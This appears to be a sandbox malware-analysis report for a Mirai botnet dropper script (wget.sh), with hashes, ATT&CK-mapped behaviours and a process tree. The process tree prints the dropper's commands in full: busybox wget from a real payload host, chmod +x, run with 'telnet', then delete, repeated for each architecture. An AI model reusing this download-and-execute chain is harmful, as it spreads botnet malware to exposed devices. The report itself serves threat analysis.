mirai | 8dcc3e92c112fb94931bd86055dc51f74a70007c058d1571a4eaec583a0852c0

Analysis

max time kernel
149s
max time network
151s
platform
debian-9_mipsel
resource
debian9-mipsel-20240418-en
resource tags

arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
10/03/2025, 22:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

wget.sh
Size

1KB
MD5

fe3891afe068ca6fc86017361dfb753c
SHA1

d631b6a4eaa99085df4260727c2c86dc82cf5428
SHA256

8dcc3e92c112fb94931bd86055dc51f74a70007c058d1571a4eaec583a0852c0
SHA512

810560af118bf04a2723fb177bbdf25682e3cb8b95611e15c8d83576305ea41ba11dec0d42c410fc5b287cb8a31901f9190946e957ac8deb8c0d634a42334951

Score

10^/10

mirai botnet botnet credential_access defense_evasion discovery

Malware Config

Extracted

Family

mirai

Botnet

BOTNET

Extracted

Family

mirai

Botnet

BOTNET

Extracted

Family

mirai

Botnet

BOTNET

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai
Contacts a large (105128) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 12 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
870	busybox
778	busybox
874	busybox
878	busybox
882	busybox
749	busybox
754	busybox
759	busybox
765	busybox
794	busybox
809	busybox
865	busybox

Executes dropped EXE 8 IoCs

ioc	pid	Process
/tmp/jklarm	750	wget.sh
/tmp/jklarm5	755	wget.sh
/tmp/jklarm6	760	wget.sh
/tmp/jklarm7	767	wget.sh
/tmp/jklm68k	779	wget.sh
/tmp/jklmips	795	wget.sh
/tmp/jklmpsl	811	wget.sh
/tmp/jklppc	866	wget.sh

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	jklmpsl
File opened for modification	/dev/misc/watchdog	jklmpsl

Renames itself 1 IoCs

pid	Process
811	jklmpsl

Unexpected DNS network traffic destination 20 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	51.158.108.203
Destination IP	51.158.108.203
Destination IP	51.158.108.203
Destination IP	51.158.108.203
Destination IP	51.158.108.203
Destination IP	51.158.108.203
Destination IP	202.61.197.122
Destination IP	202.61.197.122
Destination IP	152.53.15.127
Destination IP	51.158.108.203
Destination IP	194.36.144.87
Destination IP	51.158.108.203
Destination IP	51.158.108.203
Destination IP	194.36.144.87
Destination IP	152.53.15.127
Destination IP	51.158.108.203
Destination IP	51.158.108.203
Destination IP	202.61.197.122
Destination IP	202.61.197.122
Destination IP	202.61.197.122

Enumerates active TCP sockets 1 TTPs 1 IoCs

Gets active TCP sockets from /proc virtual filesystem.

discovery

System Network Connections Discovery

T1049

description	ioc	Process
File opened for reading	/proc/net/tcp	jklmpsl

Enumerates running processes
Discovers information about currently running processes on the system

Reads process memory 1 TTPs 35 IoCs

Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.

credential_access

Proc Filesystem

T1003.007

description	ioc	Process
File opened for reading	/proc/855/maps	jklmpsl
File opened for reading	/proc/870/maps	jklmpsl
File opened for reading	/proc/878/maps	jklmpsl
File opened for reading	/proc/879/maps	jklmpsl
File opened for reading	/proc/835/maps	jklmpsl
File opened for reading	/proc/843/maps	jklmpsl
File opened for reading	/proc/853/maps	jklmpsl
File opened for reading	/proc/859/maps	jklmpsl
File opened for reading	/proc/838/maps	jklmpsl
File opened for reading	/proc/841/maps	jklmpsl
File opened for reading	/proc/861/maps	jklmpsl
File opened for reading	/proc/873/maps	jklmpsl
File opened for reading	/proc/839/maps	jklmpsl
File opened for reading	/proc/871/maps	jklmpsl
File opened for reading	/proc/837/maps	jklmpsl
File opened for reading	/proc/866/maps	jklmpsl
File opened for reading	/proc/867/maps	jklmpsl
File opened for reading	/proc/874/maps	jklmpsl
File opened for reading	/proc/862/maps	jklmpsl
File opened for reading	/proc/877/maps	jklmpsl
File opened for reading	/proc/881/maps	jklmpsl
File opened for reading	/proc/833/maps	jklmpsl
File opened for reading	/proc/836/maps	jklmpsl
File opened for reading	/proc/846/maps	jklmpsl
File opened for reading	/proc/852/maps	jklmpsl
File opened for reading	/proc/869/maps	jklmpsl
File opened for reading	/proc/883/maps	jklmpsl
File opened for reading	/proc/845/maps	jklmpsl
File opened for reading	/proc/847/maps	jklmpsl
File opened for reading	/proc/849/maps	jklmpsl
File opened for reading	/proc/850/maps	jklmpsl
File opened for reading	/proc/857/maps	jklmpsl
File opened for reading	/proc/860/maps	jklmpsl
File opened for reading	/proc/876/maps	jklmpsl
File opened for reading	/proc/851/maps	jklmpsl

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	exim4	811	jklmpsl

Reads system network configuration 1 TTPs 1 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/tcp	jklmpsl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/843/cmdline	jklmpsl
File opened for reading	/proc/4/comm	jklmpsl
File opened for reading	/proc/6/comm	jklmpsl
File opened for reading	/proc/20/comm	jklmpsl
File opened for reading	/proc/77/comm	jklmpsl
File opened for reading	/proc/78/comm	jklmpsl
File opened for reading	/proc/718/comm	jklmpsl
File opened for reading	/proc/118/comm	jklmpsl
File opened for reading	/proc/719/comm	jklmpsl
File opened for reading	/proc/839/cmdline	jklmpsl
File opened for reading	/proc/855/cmdline	jklmpsl
File opened for reading	/proc/348/status	jklmpsl
File opened for reading	/proc/13/comm	jklmpsl
File opened for reading	/proc/838/cmdline	jklmpsl
File opened for reading	/proc/12/comm	jklmpsl
File opened for reading	/proc/18/comm	jklmpsl
File opened for reading	/proc/36/comm	jklmpsl
File opened for reading	/proc/71/comm	jklmpsl
File opened for reading	/proc/318/comm	jklmpsl
File opened for reading	/proc/698/status	jklmpsl
File opened for reading	/proc/849/cmdline	jklmpsl
File opened for reading	/proc/879/cmdline	jklmpsl
File opened for reading	/proc/37/comm	jklmpsl
File opened for reading	/proc/871/cmdline	jklmpsl
File opened for reading	/proc/876/cmdline	jklmpsl
File opened for reading	/proc/7/comm	jklmpsl
File opened for reading	/proc/76/comm	jklmpsl
File opened for reading	/proc/853/cmdline	jklmpsl
File opened for reading	/proc/721/status	jklmpsl
File opened for reading	/proc/376/status	jklmpsl
File opened for reading	/proc/862/cmdline	jklmpsl
File opened for reading	/proc/319/comm	jklmpsl
File opened for reading	/proc/712/status	jklmpsl
File opened for reading	/proc/835/cmdline	jklmpsl
File opened for reading	/proc/850/cmdline	jklmpsl
File opened for reading	/proc/73/comm	jklmpsl
File opened for reading	/proc/75/comm	jklmpsl
File opened for reading	/proc/233/comm	jklmpsl
File opened for reading	/proc/664/status	jklmpsl
File opened for reading	/proc/859/cmdline	jklmpsl
File opened for reading	/proc/877/cmdline	jklmpsl
File opened for reading	/proc/11/comm	jklmpsl
File opened for reading	/proc/698/comm	jklmpsl
File opened for reading	/proc/883/cmdline	jklmpsl
File opened for reading	/proc/24/comm	jklmpsl
File opened for reading	/proc/218/comm	jklmpsl
File opened for reading	/proc/376/comm	jklmpsl
File opened for reading	/proc/721/comm	jklmpsl
File opened for reading	/proc/837/cmdline	jklmpsl
File opened for reading	/proc/846/cmdline	jklmpsl
File opened for reading	/proc/866/cmdline	jklmpsl
File opened for reading	/proc/348/comm	jklmpsl
File opened for reading	/proc/662/status	jklmpsl
File opened for reading	/proc/852/cmdline	jklmpsl
File opened for reading	/proc/857/cmdline	jklmpsl
File opened for reading	/proc/16/comm	jklmpsl
File opened for reading	/proc/79/comm	jklmpsl
File opened for reading	/proc/426/comm	jklmpsl
File opened for reading	/proc/712/comm	jklmpsl
File opened for reading	/proc/233/status	jklmpsl
File opened for reading	/proc/21/comm	jklmpsl
File opened for reading	/proc/74/comm	jklmpsl
File opened for reading	/proc/674/comm	jklmpsl
File opened for reading	/proc/811/comm	jklmpsl

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
795	jklmips
797	busybox
783	busybox

Writes file to tmp directory 8 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/jklppc	busybox
File opened for modification	/tmp/jklarm	busybox
File opened for modification	/tmp/jklarm5	busybox
File opened for modification	/tmp/jklarm6	busybox
File opened for modification	/tmp/jklarm7	busybox
File opened for modification	/tmp/jklm68k	busybox
File opened for modification	/tmp/jklmips	busybox
File opened for modification	/tmp/jklmpsl	busybox

/tmp/wget.sh
/tmp/wget.sh
1⤵
- Executes dropped EXE
PID:721
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklarm -O jklarm
  2⤵
  - Writes file to tmp directory
  PID:723
- /bin/busybox
  /bin/busybox chmod +x jklarm
  2⤵
  - File and Directory Permissions Modification
  PID:749
- /tmp/jklarm
  ./jklarm telnet
  2⤵
  PID:750
- /bin/busybox
  /bin/busybox rm -rf jklarm
  2⤵
  PID:752
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklarm5 -O jklarm5
  2⤵
  - Writes file to tmp directory
  PID:753
- /bin/busybox
  /bin/busybox chmod +x jklarm5
  2⤵
  - File and Directory Permissions Modification
  PID:754
- /tmp/jklarm5
  ./jklarm5 telnet
  2⤵
  PID:755
- /bin/busybox
  /bin/busybox rm -rf jklarm5
  2⤵
  PID:757
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklarm6 -O jklarm6
  2⤵
  - Writes file to tmp directory
  PID:758
- /bin/busybox
  /bin/busybox chmod +x jklarm6
  2⤵
  - File and Directory Permissions Modification
  PID:759
- /tmp/jklarm6
  ./jklarm6 telnet
  2⤵
  PID:760
- /bin/busybox
  /bin/busybox rm -rf jklarm6
  2⤵
  PID:762
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklarm7 -O jklarm7
  2⤵
  - Writes file to tmp directory
  PID:763
- /bin/busybox
  /bin/busybox chmod +x jklarm7
  2⤵
  - File and Directory Permissions Modification
  PID:765
- /tmp/jklarm7
  ./jklarm7 telnet
  2⤵
  PID:767
- /bin/busybox
  /bin/busybox rm -rf jklarm7
  2⤵
  PID:769
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklm68k -O jklm68k
  2⤵
  - Writes file to tmp directory
  PID:770
- /bin/busybox
  /bin/busybox chmod +x jklm68k
  2⤵
  - File and Directory Permissions Modification
  PID:778
- /tmp/jklm68k
  ./jklm68k telnet
  2⤵
  PID:779
- /bin/busybox
  /bin/busybox rm -rf jklm68k
  2⤵
  PID:782
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklmips -O jklmips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:783
- /bin/busybox
  /bin/busybox chmod +x jklmips
  2⤵
  - File and Directory Permissions Modification
  PID:794
- /tmp/jklmips
  ./jklmips telnet
  2⤵
  - System Network Configuration Discovery
  PID:795
- /bin/busybox
  /bin/busybox rm -rf jklmips
  2⤵
  - System Network Configuration Discovery
  PID:797
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklmpsl -O jklmpsl
  2⤵
  - Writes file to tmp directory
  PID:799
- /bin/busybox
  /bin/busybox chmod +x jklmpsl
  2⤵
  - File and Directory Permissions Modification
  PID:809
- /tmp/jklmpsl
  ./jklmpsl telnet
  2⤵
  - Modifies Watchdog functionality
  - Renames itself
  - Enumerates active TCP sockets
  - Reads process memory
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:811
- /bin/busybox
  /bin/busybox rm -rf jklmpsl
  2⤵
  PID:814
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklppc -O jklppc
  2⤵
  - Writes file to tmp directory
  PID:816
- /bin/busybox
  /bin/busybox chmod +x jklppc
  2⤵
  - File and Directory Permissions Modification
  PID:865
- /tmp/jklppc
  ./jklppc telnet
  2⤵
  PID:866
- /bin/busybox
  /bin/busybox rm -rf jklppc
  2⤵
  PID:868
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklsh4 -O jklsh4
  2⤵
  PID:869
- /bin/busybox
  /bin/busybox chmod +x jklsh4
  2⤵
  - File and Directory Permissions Modification
  PID:870
- /tmp/jklsh4
  ./jklsh4 telnet
  2⤵
  PID:871
- /bin/busybox
  /bin/busybox rm -rf jklsh4
  2⤵
  PID:872
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklspc -O jklspc
  2⤵
  PID:873
- /bin/busybox
  /bin/busybox chmod +x jklspc
  2⤵
  - File and Directory Permissions Modification
  PID:874
- /tmp/jklspc
  ./jklspc telnet
  2⤵
  PID:875
- /bin/busybox
  /bin/busybox rm -rf jklspc
  2⤵
  PID:876
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklx86 -O jklx86
  2⤵
  PID:877
- /bin/busybox
  /bin/busybox chmod +x jklx86
  2⤵
  - File and Directory Permissions Modification
  PID:878
- /tmp/jklx86
  ./jklx86 telnet
  2⤵
  PID:879
- /bin/busybox
  /bin/busybox rm -rf jklx86
  2⤵
  PID:880
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklarc -O jklarc
  2⤵
  PID:881
- /bin/busybox
  /bin/busybox chmod +x jklarc
  2⤵
  - File and Directory Permissions Modification
  PID:882
- /tmp/jklarc
  ./jklarc telnet
  2⤵
  PID:883
- /bin/busybox
  /bin/busybox rm -rf jklarc
  2⤵
  PID:884
- /bin/busybox
  /bin/busybox rm -rf wget.sh
  2⤵
  PID:885

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

OS Credential Dumping

T1003

Proc Filesystem

T1003.007

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/jklarm

Filesize
60KB

MD5
35c215d8e2b2ea03a8a191fb3723195a

SHA1
c38bcfc3d7050edeff1b7dbffd85d07348bb01e9

SHA256
c4fd68b20997f3c8a60dbadf177b3309d465f0a8bb0ad9b33b4c70ee74dc3a90

SHA512
ea5a9fda95965b6eb55c47eefe2b42a9234d13c8d05556e72e916f98a626a0a835fa7f7828d4051b6056d639b06bec0136afa9ac3157736702b94c0ed9effdf8

Download Submit
/tmp/jklarm5

Filesize
60KB

MD5
a04040c769cad786555e183ba8ae0ca0

SHA1
a89d6b50a8140dddce29595c64949214e65c84f1

SHA256
7568e9e64ac1105cdcae20095154214ee943b2edc6c01e6d4b4eb0b7e06255a3

SHA512
e152f552b99683b3bf9b9fee2f7d34027a291e02dd2f912620593e714774cfe07e14aa837cdb2f2a300d35b721dfd67e7012955e24352bdad0ffecb4e61ed162

Download Submit
/tmp/jklarm6

Filesize
69KB

MD5
9e18604aa4c5bedd6e9ea6690b751880

SHA1
c1f32fe93aa650f9920fc5bd659d23621ab034a2

SHA256
41342a887d2be09cf0165913b43a5916492e677d20429068d4829a090453ccbb

SHA512
cdafb3281bcaa5f5c1af71df8d53c2d022de72a559dfea513b41bc08c7d8fe421839cfdc51b3f93f501bb62d02924e3047208e8bce3a8768af2404f3caa767b0

Download Submit
/tmp/jklarm7

Filesize
82KB

MD5
a9675614a267473cb83e195d9074a067

SHA1
a4d148cf841fc2b84c8bb3dd322e40f601532875

SHA256
fe4e8d464b7849a5483782d0c47e53deaf199e284badad12ed98ca79e47a79d9

SHA512
8adcc5df013328218823d3310bcc4f27f6e1e9e51de2e7ecd5521873f5ac6cc2315f9136e1599f1da4114e65eaed23449e78f9ce04062243aa8ec793086b1c28

Download Submit
/tmp/jklm68k

Filesize
60KB

MD5
f5fa9a5e6c2a71c86b783b6b5586c3e4

SHA1
1a7888806663b58f4bee84472dab0b63adfab8ea

SHA256
d7ed2bfe303a8e565e6b15e25920d017473b2a7678df3781b6b44840065e2c3d

SHA512
e13a443311db4a5b4fc3692be4149f534309e24134baf54f508bf56f509aaff7bfab30c1552540030e23270a689cebd7e2ad48e7989687467ada96915d5ae43a

Download Submit
/tmp/jklmips

Filesize
78KB

MD5
ce4bd94ea8cbc021bf79e11f1f734c25

SHA1
f562c88119484f3e92be6e95cb0a435836ca6362

SHA256
ef931d8ba4966260112b7ed31a1e0b5cd4423becc0397e8eeaee345de903a1ab

SHA512
d0a85bbbf02f85e445856cced0f7942652ca8c2d748f17a25129b5fa2982df148d5b2580d4c7512d579e4e666ec62700233802a145bbeb38715e77f847f26d29

Download Submit
/tmp/jklmpsl

Filesize
79KB

MD5
9f79f159a672411a7e5b01f1ed3deb4a

SHA1
98584c58a231322ed3e64b96727fe6d935f30aa4

SHA256
9cf41e60807702cd85a42ffcabb10f2798193200a381b47f3adbebe65f8360aa

SHA512
8486d8dbf427ba9e45b81ae462b64239e7aa33e55603ffa12b8cf7efc80e4b0300e6764fb1c89bc261f910178553b68adc6401fb7de1f6eb36a4f76b5b5b5537

Download Submit
/tmp/jklppc

Filesize
59KB

MD5
2d898ada13cb85e3fc710949c44ade47

SHA1
db36b96c9531eff756b3d2ee92b632bc4903a179

SHA256
00188561e6b9bf60b853e3d752f4131b575a77f48dfdb69f39692e20496f8cdd

SHA512
e4952241a4ba8a4a83952c28f6396f575ad304ef212bc1897d2790175dfbab0d2c4f1ae2cfca67825ace8eef17c4b4064fde2e31b12ddbe87b6c074f8e9a6b78

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads